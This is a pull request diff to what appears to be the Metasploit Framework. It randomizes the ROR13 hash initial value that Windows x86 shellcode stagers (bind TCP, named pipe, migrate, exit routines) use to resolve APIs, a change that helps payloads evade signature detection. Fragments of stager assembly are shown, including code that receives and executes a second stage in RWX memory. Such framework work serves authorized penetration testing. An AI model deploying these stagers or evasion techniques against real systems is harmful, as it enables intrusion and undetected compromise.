### PR TITLE
Block Api ROR13 IV randomization

### DIFF
--- a/lib/msf/core/payload/windows.rb
+++ b/lib/msf/core/payload/windows.rb
@@ -22,14 +22,32 @@ module Msf::Payload::Windows
   #
   # ROR hash associations for some of the exit technique routines.
 
+  def exitfunc_helper(type)
+    iv = 0 if block_api_iv.nil?
+    case type
+    when 'seh'
+      return Rex::Text.block_api_hash("kernel32.dll", "SetUnhandledExceptionFilter", iv: iv).to_i(16)
+    when 'thread'
+      return Rex::Text.block_api_hash("kernel32.dll", "ExitThread", iv: iv).to_i(16)
+    when 'process'
+      return Rex::Text.block_api_hash("kernel32.dll", "ExitProcess", iv: iv).to_i(16)
+    when 'none'
+      return Rex::Text.block_api_hash("kernel32.dll", "GetLastError", iv: iv).to_i(16)
+    else
+      return 0
+    end
+
+
+
+  end
   @@exit_types =
     {
-      nil       => 0,          # Default to nothing
-      ''        => 0,          # Default to nothing
-      'seh'     => Rex::Text.block_api_hash("kernel32.dll", "SetUnhandledExceptionFilter").to_i(16), # SetUnhandledExceptionFilter
-      'thread'  => Rex::Text.block_api_hash("kernel32.dll", "ExitThread").to_i(16), # ExitThread
-      'process' => Rex::Text.block_api_hash("kernel32.dll", "ExitProcess").to_i(16), # ExitProcess
-      'none'    => Rex::Text.block_api_hash("kernel32.dll", "GetLastError").to_i(16)  # GetLastError
+      nil       => exitfunc_helper(nil),          # Default to nothing
+      ''        => exitfunc_helper(''),           # Default to nothing
+      'seh'     => exitfunc_helper('seh'),        # SetUnhandledExceptionFilter
+      'thread'  => exitfunc_helper('thread'),     # ExitThread
+      'process' => exitfunc_helper('process'),    # ExitProcess
+      'none'    => exitfunc_helper('none')        # GetLastError
     }
 
   #
@@ -112,6 +130,7 @@ module Msf::Payload::Windows
     # data into a buffer which is allocated with VirtualAlloc to avoid running
     # out of stack space or NX problems.
     # See the source file: /external/source/shellcode/windows/midstager.asm
+    # TODO: We should update the midstager to use block-api randomization (passing it to metasm, and block api...)
     midstager =
       "\xfc\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x50\x1c\x8b\x12\x8b" +
       "\x72\x20\xad\xad\x4e\x03\x06\x3d\x32\x33\x5f\x32\x0f\x85\xeb\xff" +

--- a/lib/msf/core/payload/windows.rb
+++ b/lib/msf/core/payload/windows.rb
@@ -22,30 +22,14 @@ module Msf::Payload::Windows
   #
   # ROR hash associations for some of the exit technique routines.
 
-  def self.exitfunc_helper(type)
-    iv = 0 if block_api_iv.nil?
-    case type
-    when 'seh'
-      return Rex::Text.block_api_hash("kernel32.dll", "SetUnhandledExceptionFilter", iv: iv).to_i(16)
-    when 'thread'
-      return Rex::Text.block_api_hash("kernel32.dll", "ExitThread", iv: iv).to_i(16)
-    when 'process'
-      return Rex::Text.block_api_hash("kernel32.dll", "ExitProcess", iv: iv).to_i(16)
-    when 'none'
-      return Rex::Text.block_api_hash("kernel32.dll", "GetLastError", iv: iv).to_i(16)
-    else
-      return 0
-    end
-  end
-
   @@exit_types =
     {
-      nil       => exitfunc_helper(nil),          # Default to nothing
-      ''        => exitfunc_helper(''),           # Default to nothing
-      'seh'     => exitfunc_helper('seh'),        # SetUnhandledExceptionFilter
-      'thread'  => exitfunc_helper('thread'),     # ExitThread
-      'process' => exitfunc_helper('process'),    # ExitProcess
-      'none'    => exitfunc_helper('none')        # GetLastError
+      nil       => 0,          # Default to nothing
+      ''        => 0,          # Default to nothing
+      'seh'     => Rex::Text.block_api_hash("kernel32.dll", "SetUnhandledExceptionFilter").to_i(16), # SetUnhandledExceptionFilter
+      'thread'  => Rex::Text.block_api_hash("kernel32.dll", "ExitThread").to_i(16), # ExitThread
+      'process' => Rex::Text.block_api_hash("kernel32.dll", "ExitProcess").to_i(16), # ExitProcess
+      'none'    => Rex::Text.block_api_hash("kernel32.dll", "GetLastError").to_i(16)  # GetLastError
     }
 
   #
@@ -100,7 +84,18 @@ module Msf::Payload::Windows
       method = datastore[name]
       method = 'thread' if (!method or @@exit_types.include?(method) == false)
 
-      raw[offset, 4] = [ @@exit_types[method] ].pack(pack || 'V')
+      if respond_to?(:block_api_hash)
+        exit_hash = block_api_hash('kernel32.dll', {
+          'seh'     => 'SetUnhandledExceptionFilter',
+          'thread'  => 'ExitThread',
+          'process' => 'ExitProcess',
+          'none'    => 'GetLastError'
+        }[method]).to_i(16)
+      else
+        exit_hash = @@exit_types[method]
+      end
+
+      raw[offset, 4] = [ exit_hash ].pack(pack || 'V')
 
       return true
     end

--- a/lib/msf/core/payload/windows.rb
+++ b/lib/msf/core/payload/windows.rb
@@ -22,7 +22,7 @@ module Msf::Payload::Windows
   #
   # ROR hash associations for some of the exit technique routines.
 
-  def exitfunc_helper(type)
+  def self.exitfunc_helper(type)
     iv = 0 if block_api_iv.nil?
     case type
     when 'seh'
@@ -36,10 +36,8 @@ module Msf::Payload::Windows
     else
       return 0
     end
-
-
-
   end
+
   @@exit_types =
     {
       nil       => exitfunc_helper(nil),          # Default to nothing

--- a/lib/msf/core/payload/windows/bind_named_pipe.rb
+++ b/lib/msf/core/payload/windows/bind_named_pipe.rb
@@ -59,7 +59,6 @@ module Payload::Windows::BindNamedPipe
   # Generate and compile the stager
   #
   def generate_bind_named_pipe(opts={})
-    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                     ; Clear the direction flag.
       call start              ; Call start, this pushes the address of 'api_call' onto the stack.

--- a/lib/msf/core/payload/windows/bind_named_pipe.rb
+++ b/lib/msf/core/payload/windows/bind_named_pipe.rb
@@ -59,6 +59,7 @@ module Payload::Windows::BindNamedPipe
   # Generate and compile the stager
   #
   def generate_bind_named_pipe(opts={})
+    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                     ; Clear the direction flag.
       call start              ; Call start, this pushes the address of 'api_call' onto the stack.
@@ -118,7 +119,7 @@ module Payload::Windows::BindNamedPipe
         db #{raw_to_db(uuid_raw)}  ; lpBuffer
       get_uuid_address:
         push edi                   : hPipe
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'WriteFile')}
+        push #{block_api_hash('kernel32.dll', 'WriteFile')}
         call ebp                   ; WriteFile(hPipe, lpBuffer, nNumberOfBytesToWrite, lpNumberOfBytesWritten)
     ^
   end
@@ -154,7 +155,7 @@ module Payload::Windows::BindNamedPipe
         call get_pipe_name      ; lpName
         db "#{full_pipe_name}", 0x00
       get_pipe_name:
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'CreateNamedPipeA')}
+        push #{block_api_hash('kernel32.dll', 'CreateNamedPipeA')}
         call ebp                ; CreateNamedPipeA(lpName, dwOpenMode, dwPipeMode, nMaxInstances, nOutBufferSize,
                                 ;                  nInBufferSize, nDefaultTimeOut, lpSecurityAttributes)
         mov edi, eax            ; save hPipe (using sockedi convention)
@@ -171,11 +172,11 @@ module Payload::Windows::BindNamedPipe
       connect_pipe:
         push 0                  ; lpOverlapped
         push edi                ; hPipe
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'ConnectNamedPipe')}
+        push #{block_api_hash('kernel32.dll', 'ConnectNamedPipe')}
         call ebp                ; ConnectNamedPipe(hPipe, lpOverlapped)
 
       ; check for failure
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'GetLastError')}
+        push #{block_api_hash('kernel32.dll', 'GetLastError')}
         call ebp                ; GetLastError()
         cmp eax, 0x217          ; looking for ERROR_PIPE_CONNECTED
         jz get_stage_size       ; success
@@ -184,7 +185,7 @@ module Payload::Windows::BindNamedPipe
 
       ; wait before trying again
         push #{retry_wait}
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')}
+        push #{block_api_hash('kernel32.dll', 'Sleep')}
         call ebp                ; Sleep(millisecs)
         jmp connect_pipe
       ^
@@ -202,7 +203,7 @@ module Payload::Windows::BindNamedPipe
         push 0                  ; lpMaxCollectionCount
         push ecx                ; lpMode (PIPE_WAIT)
         push edi                ; hPipe
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'SetNamedPipeHandleState')}
+        push #{block_api_hash('kernel32.dll', 'SetNamedPipeHandleState')}
         call ebp                ; SetNamedPipeHandleState(hPipe, lpMode, lpMaxCollectionCount, lpCollectDataTimeout)
       ^
     end
@@ -217,7 +218,7 @@ module Payload::Windows::BindNamedPipe
         lea ecx, [esp+16]       ; lpBuffer
         push ecx
         push edi                ; hPipe
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')}
+        push #{block_api_hash('kernel32.dll', 'ReadFile')}
         call ebp                ; ReadFile(hPipe, lpBuffer, nNumberOfBytesToRead, lpNumberOfBytesRead, lpOverlapped)
         pop eax                 ; lpNumberOfBytesRead
         pop esi                 ; lpBuffer (stage size)
@@ -238,7 +239,7 @@ module Payload::Windows::BindNamedPipe
         push 0x1000             ; MEM_COMMIT
         push esi                ; dwLength
         push 0                  ; NULL as we dont care where the allocation is
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
+        push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
         call ebp                ; VirtualAlloc(NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
       ^
 
@@ -267,7 +268,7 @@ module Payload::Windows::BindNamedPipe
         push edx                ; nNumberOfBytesToRead
         push ebx                ; lpBuffer
         push edi                ; hPipe
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')}
+        push #{block_api_hash('kernel32.dll', 'ReadFile')}
         call ebp                ; ReadFile(hPipe, lpBuffer, nNumberOfBytesToRead, lpNumberOfBytesRead, lpOverlapped)
         pop edx                 ; lpNumberOfBytesRead
     ^
@@ -283,13 +284,13 @@ module Payload::Windows::BindNamedPipe
         push 0x8000             ; MEM_RELEASE
         push 0                  ; dwSize, 0 to decommit whole block
         push ecx                ; lpAddress
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')}
+        push #{block_api_hash('kernel32.dll', 'VirtualFree')}
         call ebp                ; VirtualFree(payload, 0, MEM_RELEASE)
 
       cleanup_file:
       ; cleanup the pipe handle
         push edi                ; file handle
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')}
+        push #{block_api_hash('kernel32.dll', 'CloseHandle')}
         call ebp                ; CloseHandle(hPipe)
 
         jmp failure
@@ -319,14 +320,14 @@ module Payload::Windows::BindNamedPipe
         call get_kernel32_name
         db "kernel32", 0x00
       get_kernel32_name:
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'GetModuleHandleA')}
+        push #{block_api_hash('kernel32.dll', 'GetModuleHandleA')}
         call ebp                ; GetModuleHandleA("kernel32")
 
         call get_exit_name
         db "ExitThread", 0x00
       get_exit_name:            ; lpProcName
         push eax                ; hModule
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'GetProcAddress')}
+        push #{block_api_hash('kernel32.dll', 'GetProcAddress')}
         call ebp                ; GetProcAddress(hModule, "ExitThread")
         push 0                  ; dwExitCode
         call eax                ; ExitProcess(0)

--- a/lib/msf/core/payload/windows/bind_tcp.rb
+++ b/lib/msf/core/payload/windows/bind_tcp.rb
@@ -59,7 +59,6 @@ module Payload::Windows::BindTcp
   # Generate and compile the stager
   #
   def generate_bind_tcp(opts={})
-    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                    ; Clear the direction flag.
       call start             ; Call start, this pushes the address of 'api_call' onto the stack.

--- a/lib/msf/core/payload/windows/bind_tcp.rb
+++ b/lib/msf/core/payload/windows/bind_tcp.rb
@@ -59,6 +59,7 @@ module Payload::Windows::BindTcp
   # Generate and compile the stager
   #
   def generate_bind_tcp(opts={})
+    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                    ; Clear the direction flag.
       call start             ; Call start, this pushes the address of 'api_call' onto the stack.
@@ -121,14 +122,14 @@ module Payload::Windows::BindTcp
         push 0x00003233        ; Push the bytes 'ws2_32',0,0 onto the stack.
         push 0x5F327377        ; ...
         push esp               ; Push a pointer to the "ws2_32" string on the stack.
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+        push #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
         call ebp               ; LoadLibraryA( "ws2_32" )
 
         mov eax, 0x0190        ; EAX = sizeof( struct WSAData )
         sub esp, eax           ; alloc some space for the WSAData structure
         push esp               ; push a pointer to this struct
         push eax               ; push the wVersionRequested parameter
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
+        push #{block_api_hash('ws2_32.dll', 'WSAStartup')}
         call ebp               ; WSAStartup( 0x0190, &WSAData );
 
         push 11
@@ -144,7 +145,7 @@ module Payload::Windows::BindTcp
                                ; we do not specify a protocol [5]
         push 1                 ; push SOCK_STREAM
         push #{addr_fam}       ; push AF_INET/6
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
+        push #{block_api_hash('ws2_32.dll', 'WSASocketA')}
         call ebp               ; WSASocketA( AF_INET/6, SOCK_STREAM, 0, 0, 0, 0 );
         xchg edi, eax          ; save the socket for later, don't care about the value of eax after this
 
@@ -155,7 +156,7 @@ module Payload::Windows::BindTcp
         push #{sockaddr_size}  ; length of the sockaddr_in struct (we only set the first 8 bytes, the rest aren't used)
         push esi               ; pointer to the sockaddr_in struct
         push edi               ; socket
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'bind')}
+        push #{block_api_hash('ws2_32.dll', 'bind')}
         call ebp               ; bind( s, &sockaddr_in, 16 );
     ^
 
@@ -170,18 +171,18 @@ module Payload::Windows::BindTcp
     asm << %Q^
                                ; backlog, pushed earlier [3]
         push edi               ; socket
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'listen')}
+        push #{block_api_hash('ws2_32.dll', 'listen')}
         call ebp               ; listen( s, 0 );
 
                                ; we set length for the sockaddr struct to zero, pushed earlier [2]
                                ; we dont set the optional sockaddr param, pushed earlier [1]
         push edi               ; listening socket
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'accept')}
+        push #{block_api_hash('ws2_32.dll', 'accept')}
         call ebp               ; accept( s, 0, 0 );
 
         push edi               ; push the listening socket
         xchg edi, eax          ; replace the listening socket with the new connected socket for further comms
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}
+        push #{block_api_hash('ws2_32.dll', 'closesocket')}
         call ebp               ; closesocket( s );
     ^
 
@@ -204,7 +205,7 @@ module Payload::Windows::BindTcp
         push 4                 ; length = sizeof( DWORD );
         push esi               ; the 4 byte buffer on the stack to hold the second stage length
         push edi               ; the saved socket
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
+        push #{block_api_hash('ws2_32.dll', 'recv')}
         call ebp               ; recv( s, &dwLength, 4, 0 );
     ^
 
@@ -223,7 +224,7 @@ module Payload::Windows::BindTcp
         push 0x1000            ; MEM_COMMIT
         push esi               ; push the newly received second stage length.
         push 0                 ; NULL as we dont care where the allocation is.
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
+        push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
         call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
         ; Receive the second stage and execute it...
         xchg ebx, eax          ; ebx = our new memory address for the new stage
@@ -233,7 +234,7 @@ module Payload::Windows::BindTcp
         push esi               ; length
         push ebx               ; the current address into our second stage's RWX buffer
         push edi               ; the saved socket
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
+        push #{block_api_hash('ws2_32.dll', 'recv')}
         call ebp               ; recv( s, buffer, length, 0 );
     ^
 
@@ -261,7 +262,7 @@ module Payload::Windows::BindTcp
       else
         asm << %Q^
       failure:
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
+        push #{block_api_hash('kernel32.dll', 'ExitProcess')}
         call ebp
         ^
       end

--- a/lib/msf/core/payload/windows/bind_tcp_rc4.rb
+++ b/lib/msf/core/payload/windows/bind_tcp_rc4.rb
@@ -39,6 +39,7 @@ module Payload::Windows::BindTcpRc4
   # Generate and compile the stager
   #
   def generate_bind_tcp_rc4(opts={})
+    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                    ; Clear the direction flag.
       call start             ; Call start, this pushes the address of 'api_call' onto the stack.
@@ -61,7 +62,7 @@ module Payload::Windows::BindTcpRc4
         push 4                  ; length = sizeof( DWORD );
         push esi                ; the 4 byte buffer on the stack to hold the second stage length
         push edi                ; the saved socket
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
+        push #{block_api_hash('ws2_32.dll', 'recv')}
         call ebp                ; recv( s, &dwLength, 4, 0 );
     ^
 
@@ -83,7 +84,7 @@ module Payload::Windows::BindTcpRc4
       ; push esi               ; push the newly received second stage length.
           push ecx             ; push the alloc length
         push 0                 ; NULL as we dont care where the allocation is.
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
+        push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
         call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
       ; Receive the second stage and execute it...
       ; xchg ebx, eax          ; ebx = our new memory address for the new stage + S-box
@@ -96,7 +97,7 @@ module Payload::Windows::BindTcpRc4
         push esi               ; length
         push ebx               ; the current address into our second stage's RWX buffer
         push edi               ; the saved socket
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
+        push #{block_api_hash('ws2_32.dll', 'recv')}
         call ebp               ; recv( s, buffer, length, 0 );
     ^
 
@@ -138,7 +139,7 @@ module Payload::Windows::BindTcpRc4
       else
         asm << %Q^
       failure:
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
+        push #{block_api_hash('kernel32.dll', 'ExitProcess')}
         call ebp
         ^
       end

--- a/lib/msf/core/payload/windows/bind_tcp_rc4.rb
+++ b/lib/msf/core/payload/windows/bind_tcp_rc4.rb
@@ -39,7 +39,6 @@ module Payload::Windows::BindTcpRc4
   # Generate and compile the stager
   #
   def generate_bind_tcp_rc4(opts={})
-    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                    ; Clear the direction flag.
       call start             ; Call start, this pushes the address of 'api_call' onto the stack.

--- a/lib/msf/core/payload/windows/block_api.rb
+++ b/lib/msf/core/payload/windows/block_api.rb
@@ -12,12 +12,16 @@ module Payload::Windows::BlockApi
 
   @block_api_iv = nil
 
-  def block_api_iv
-    @block_api_iv ||= rand(0x100000000)
+  def block_api_iv(opts={})
+    if opts.key?(:block_api_iv) && !@block_api_iv.nil? && @block_api_iv != opts[:block_api_iv]
+      print_warning("Warning: block_api_iv is already set to a different value, if you are using an hardcoded value, make sure to call the first function between block_api_iv, asm_block_api and block_api_hash with opts[:block_api_iv] set")
+    end
+    @block_api_iv ||= opts.fetch(:block_api_iv) { rand(0x100000000) }
+    vprint_status("Current block_api_iv: 0x%08x" % @block_api_iv)
+    @block_api_iv
   end
 
   def asm_block_api(opts={})
-    @block_api_iv ||= rand(0x100000000)
     asm = Rex::Payloads::Shuffle.from_graphml_file(
       File.join(Msf::Config.install_root, 'data', 'shellcode', 'block_api.x86.graphml'),
       arch: ARCH_X86,
@@ -25,13 +29,16 @@ module Payload::Windows::BlockApi
     )
     # Patch the assembly to set the correct IV
     # db 0xbf, 0x00, 0x00, 0x00, 0x00  =>  mov edi, <iv>
-    iv_bytes = [block_api_iv].pack('V').bytes.map { |b| "0x%02x" % b }.join(', ')
+    iv_bytes = [block_api_iv(opts)].pack('V').bytes.map { |b| "0x%02x" % b }.join(', ')
     asm.sub!("db 0xbf, 0x00, 0x00, 0x00, 0x00", "db 0xbf, #{iv_bytes}")
+    unless asm.include?("db 0xbf, #{iv_bytes}")
+      raise "Failed to patch block_api assembly with IV #{block_api_iv(opts)} (#{iv_bytes})"
+    end
     asm
   end
 
-  def block_api_hash(mod, func)
-    Rex::Text.block_api_hash(mod, func, iv: @block_api_iv)
+  def block_api_hash(mod, func, opts={})
+    Rex::Text.block_api_hash(mod, func, iv: block_api_iv(opts))
   end
 
 end

--- a/lib/msf/core/payload/windows/block_api.rb
+++ b/lib/msf/core/payload/windows/block_api.rb
@@ -10,12 +10,28 @@ module Msf
 ###
 module Payload::Windows::BlockApi
 
+  @block_api_iv = nil
+
+  def block_api_iv
+    @block_api_iv ||= rand(0x100000000)
+  end
+
   def asm_block_api(opts={})
-    Rex::Payloads::Shuffle.from_graphml_file(
+    @block_api_iv ||= rand(0x100000000)
+    asm = Rex::Payloads::Shuffle.from_graphml_file(
       File.join(Msf::Config.install_root, 'data', 'shellcode', 'block_api.x86.graphml'),
       arch: ARCH_X86,
       name: 'api_call'
     )
+    # Patch the assembly to set the correct IV
+    # db 0xbf, 0x00, 0x00, 0x00, 0x00  =>  mov edi, <iv>
+    iv_bytes = [block_api_iv].pack('V').bytes.map { |b| "0x%02x" % b }.join(', ')
+    asm.sub!("db 0xbf, 0x00, 0x00, 0x00, 0x00", "db 0xbf, #{iv_bytes}")
+    asm
+  end
+
+  def block_api_hash(mod, func)
+    Rex::Text.block_api_hash(mod, func, iv: @block_api_iv)
   end
 
 end

--- a/lib/msf/core/payload/windows/block_api.rb
+++ b/lib/msf/core/payload/windows/block_api.rb
@@ -13,12 +13,7 @@ module Payload::Windows::BlockApi
   @block_api_iv = nil
 
   def block_api_iv(opts={})
-    if opts.key?(:block_api_iv) && !@block_api_iv.nil? && @block_api_iv != opts[:block_api_iv]
-      print_warning("Warning: block_api_iv is already set to a different value, if you are using an hardcoded value, make sure to call the first function between block_api_iv, asm_block_api and block_api_hash with opts[:block_api_iv] set")
-    end
-    @block_api_iv ||= opts.fetch(:block_api_iv) { rand(0x100000000) }
-    vprint_status("Current block_api_iv: 0x%08x" % @block_api_iv)
-    @block_api_iv
+    @block_api_iv ||= rand(0x100000000)
   end
 
   def asm_block_api(opts={})
@@ -27,18 +22,20 @@ module Payload::Windows::BlockApi
       arch: ARCH_X86,
       name: 'api_call'
     )
+    iv = opts.fetch(:block_api_iv) { block_api_iv }
     # Patch the assembly to set the correct IV
     # db 0xbf, 0x00, 0x00, 0x00, 0x00  =>  mov edi, <iv>
-    iv_bytes = [block_api_iv(opts)].pack('V').bytes.map { |b| "0x%02x" % b }.join(', ')
-    asm.sub!("db 0xbf, 0x00, 0x00, 0x00, 0x00", "db 0xbf, #{iv_bytes}")
-    unless asm.include?("db 0xbf, #{iv_bytes}")
-      raise "Failed to patch block_api assembly with IV #{block_api_iv(opts)} (#{iv_bytes})"
+    iv_bytes = [iv].pack('V').bytes.map { |b| "0x%02x" % b }.join(', ')
+    unless asm.include?("db 0xbf, 0x00, 0x00, 0x00, 0x00")
+      raise "Failed to patch block_api assembly with IV 0x#{iv.to_s(16).rjust(8, '0')} (#{iv_bytes})"
     end
+    asm.sub!("db 0xbf, 0x00, 0x00, 0x00, 0x00", "db 0xbf, #{iv_bytes}")
     asm
   end
 
   def block_api_hash(mod, func, opts={})
-    Rex::Text.block_api_hash(mod, func, iv: block_api_iv(opts))
+    iv = opts.fetch(:block_api_iv) { block_api_iv }
+    Rex::Text.block_api_hash(mod, func, iv: iv)
   end
 
 end

--- a/lib/msf/core/payload/windows/exitfunk.rb
+++ b/lib/msf/core/payload/windows/exitfunk.rb
@@ -33,13 +33,13 @@ module Payload::Windows::Exitfunk
     when 'thread'
       asm << %Q^
         mov ebx, 0x#{Msf::Payload::Windows.exit_types['thread'].to_s(16)}
-        push #{Rex::Text.block_api_hash("kernel32.dll", "GetVersion")}        ; hash( "kernel32.dll", "GetVersion" )
+        push #{block_api_hash("kernel32.dll", "GetVersion")}        ; hash( "kernel32.dll", "GetVersion" )
         call ebp               ; GetVersion(); (AL will = major version and AH will = minor version)
         cmp al, 6              ; If we are not running on Windows Vista, 2008 or 7
         jl exitfunk_goodbye    ; Then just call the exit function...
         cmp bl, 0xE0           ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
         jne exitfunk_goodbye   ;
-        mov ebx, #{Rex::Text.block_api_hash("ntdll.dll", "RtlExitUserThread")}     ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
+        mov ebx, #{block_api_hash("ntdll.dll", "RtlExitUserThread")}     ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
       exitfunk_goodbye:        ; We now perform the actual call to the exit function
         push.i8 0              ; push the exit function parameter
         push ebx               ; push the hash of the exit function
@@ -56,7 +56,7 @@ module Payload::Windows::Exitfunk
 
     when 'sleep'
       asm << %Q^
-        mov ebx, #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')}
+        mov ebx, #{block_api_hash('kernel32.dll', 'Sleep')}
         push 300000            ; 300 seconds
         push ebx               ; push the hash of the function
         call ebp               ; Sleep(300000)

--- a/lib/msf/core/payload/windows/exitfunk.rb
+++ b/lib/msf/core/payload/windows/exitfunk.rb
@@ -18,7 +18,7 @@ module Payload::Windows::Exitfunk
 
     when 'seh'
       asm << %Q^
-        mov ebx, 0x#{Msf::Payload::Windows.exit_types['seh'].to_s(16)}
+        mov ebx, #{block_api_hash('kernel32.dll', 'SetUnhandledExceptionFilter')}
         push.i8 0              ; push the exit function parameter
         push ebx               ; push the hash of the exit function
         call ebp               ; SetUnhandledExceptionFilter(0)
@@ -32,7 +32,7 @@ module Payload::Windows::Exitfunk
 
     when 'thread'
       asm << %Q^
-        mov ebx, 0x#{Msf::Payload::Windows.exit_types['thread'].to_s(16)}
+        mov ebx, #{block_api_hash('kernel32.dll', 'ExitThread')}
         push #{block_api_hash("kernel32.dll", "GetVersion")}        ; hash( "kernel32.dll", "GetVersion" )
         call ebp               ; GetVersion(); (AL will = major version and AH will = minor version)
         cmp al, 6              ; If we are not running on Windows Vista, 2008 or 7
@@ -48,7 +48,7 @@ module Payload::Windows::Exitfunk
 
     when 'process', nil
       asm << %Q^
-        mov ebx, 0x#{Msf::Payload::Windows.exit_types['process'].to_s(16)}
+        mov ebx, #{block_api_hash('kernel32.dll', 'ExitProcess')}
         push.i8 0              ; push the exit function parameter
         push ebx               ; push the hash of the exit function
         call ebp               ; ExitProcess(0)

--- a/lib/msf/core/payload/windows/migrate_common.rb
+++ b/lib/msf/core/payload/windows/migrate_common.rb
@@ -18,6 +18,7 @@ module Payload::Windows::MigrateCommon
   # Constructs the migrate stub on the fly
   #
   def generate(opts={})
+    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     asm = %Q^
     migrate:
       cld
@@ -31,7 +32,7 @@ module Payload::Windows::MigrateCommon
     #{generate_migrate(opts)}
     signal_event:
       push dword [esi]    ; Event handle is pointed at by esi
-      push #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')}
+      push #{block_api_hash('kernel32.dll', 'SetEvent')}
       call ebp            ; SetEvent(handle)
     call_payload:
       call dword [esi+8]  ; Invoke the associated payload

--- a/lib/msf/core/payload/windows/migrate_common.rb
+++ b/lib/msf/core/payload/windows/migrate_common.rb
@@ -18,7 +18,6 @@ module Payload::Windows::MigrateCommon
   # Constructs the migrate stub on the fly
   #
   def generate(opts={})
-    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     asm = %Q^
     migrate:
       cld

--- a/lib/msf/core/payload/windows/migrate_named_pipe.rb
+++ b/lib/msf/core/payload/windows/migrate_named_pipe.rb
@@ -32,7 +32,7 @@ module Payload::Windows::MigrateNamedPipe
       mov edi, [esi+16]         ; The duplicated pipe handle is in the migrate context.
     signal_pipe_event:
       push dword [esi]          ; Event handle is pointed at by esi
-      push #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')}
+      push #{block_api_hash('kernel32.dll', 'SetEvent')}
       call ebp                  ; SetEvent(handle)
     call_pipe_payload:
       call dword [esi+8]        ; call the associated payload

--- a/lib/msf/core/payload/windows/migrate_tcp.rb
+++ b/lib/msf/core/payload/windows/migrate_tcp.rb
@@ -34,14 +34,14 @@ module Payload::Windows::MigrateTcp
       push '32'
       push 'ws2_'
       push esp                  ; pointer to 'ws2_32'
-      push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+      push #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
       call ebp                  ; LoadLibraryA('ws2_32')
     init_networking:
       mov eax, #{WSA_VERSION}   ; EAX == version, and is also used for size
       sub esp, eax              ; allocate space for the WSAData structure
       push esp                  ; Pointer to the WSAData structure
       push eax                  ; Version required
-      push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
+      push #{block_api_hash('ws2_32.dll', 'WSAStartup')}
       call ebp                  ; WSAStartup(Version, &WSAData)
     create_socket:
       push eax                  ; eax is 0 on success, use it for flags
@@ -53,7 +53,7 @@ module Payload::Windows::MigrateTcp
       push eax                  ; SOCK_STREAM
       inc eax
       push eax                  ; AF_INET
-      push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
+      push #{block_api_hash('ws2_32.dll', 'WSASocketA')}
       call ebp                  ; WSASocketA(AF_INET, SOCK_STREAM, 0, &info, 0, 0)
       xchg edi, eax
     ^

--- a/lib/msf/core/payload/windows/prepend_migrate.rb
+++ b/lib/msf/core/payload/windows/prepend_migrate.rb
@@ -70,21 +70,21 @@ module Msf::Payload::Windows::PrependMigrate
     exitblock = %Q^
       ;sleep
       push -1
-      push #{Rex::Text.block_api_hash("kernel32.dll", "Sleep")}           ; hash( "kernel32.dll", "Sleep" )
+      push #{block_api_obj.block_api_hash("kernel32.dll", "Sleep")}           ; hash( "kernel32.dll", "Sleep" )
       call ebp                  ; Sleep( ... );
